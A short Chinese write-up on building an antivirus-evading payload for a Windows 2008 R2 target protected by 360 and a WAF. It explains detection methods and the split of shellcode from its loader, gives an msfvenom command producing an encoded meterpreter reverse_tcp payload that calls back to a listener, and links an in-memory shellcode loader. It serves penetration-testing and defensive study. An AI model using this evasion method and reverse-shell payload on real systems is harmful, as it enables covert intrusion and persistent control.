Windows环境下APT攻击与防御：免杀Payload技术分享

本文主要回顾了一次针对Windows 2008 R2 x64系统的APT攻击与防御项目，系统环境中包含360安全软件、WAF防护，并且运行着OAWeb服务（基于.NET和MSSQL）。目标机只支持ASPx页面，同时作为内网中的数据库服务器，存储MySQL数据库，但不支持PHP且没有.NET Framework for MySQL驱动。在这样的背景下，文章重点讨论了解决payload问题以及如何实现免杀技术。 在项目实施过程中，由于目标机上安装了特定软件，因此必须设计能够绕过安全检测的payload。作者提到了两种主要的payload分离免杀方法：第三方工具和自带安装分离。文章选择了第三方分离免杀策略。现代反病毒软件通常采用基于特征、行为或云查杀的方法，其中云查杀也依赖于特征匹配。针对PE头文件的查杀对于大文件来说尤为有效。因此，作者采取了特征与行为分离的免杀技术，避免使用PE头文件，并将行为与特征分开，以提高payload在Windows环境下的稳定性和隐蔽性。 具体实现步骤包括： 1. 使用Metasploit框架生成非PE格式的shellcode，例如使用`msfvenom`命令创建一个用于reverse_tcp连接的x64 shellcode，指定监听IP和端口，如`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=8080 -e x86/shikata_ga_nai -i 5 -f raw > test.c`。 2. 接下来，需要一个第三方程序来加载并执行这个shellcode。作者引用了一个GitHub上的开源项目（https://github.com/clinicallyinane/shellcode_loader）作为示例，这个工具可以用来启动并加载shellcode到内存中，从而避免在磁盘上留下可执行文件，减少被安全软件检测到的风险。 通过这样的方法，攻击者能够在目标系统中建立持久化控制，同时尽可能地避免被现有的安全解决方案检测到。这种方法对于渗透测试和理解高级持续性威胁（APT）的攻击手段和技术具有参考价值，同时也提醒了系统管理员和安全从业者要对这类攻击手段保持警惕。